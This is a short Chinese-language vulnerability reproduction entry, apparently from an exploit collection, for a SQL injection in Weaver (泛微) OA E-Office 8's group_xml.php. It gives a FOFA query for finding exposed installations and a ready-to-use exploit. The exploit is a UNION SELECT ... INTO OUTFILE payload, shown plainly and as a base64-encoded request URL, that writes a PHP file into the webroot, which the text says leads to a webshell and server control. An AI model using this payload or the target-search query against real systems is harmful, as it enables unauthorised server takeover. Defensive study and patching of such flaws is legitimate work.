漏洞描述 #
泛微OA E-Office group_xml.php文件存在SQL注入漏洞,攻击者通过漏洞可以写入Webshell文件获取服务器权限
漏洞影响 #
泛微OA E-Office 8
FOFA #
app="泛微-EOffice"
漏洞复现 #
存在漏洞的文件为 inc/group_user_list/group_xml.php
构造EXP写入文件
[group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/vulntest.php']
|
| base64
|
/inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3Z1bG50ZXN0LnBocCdd
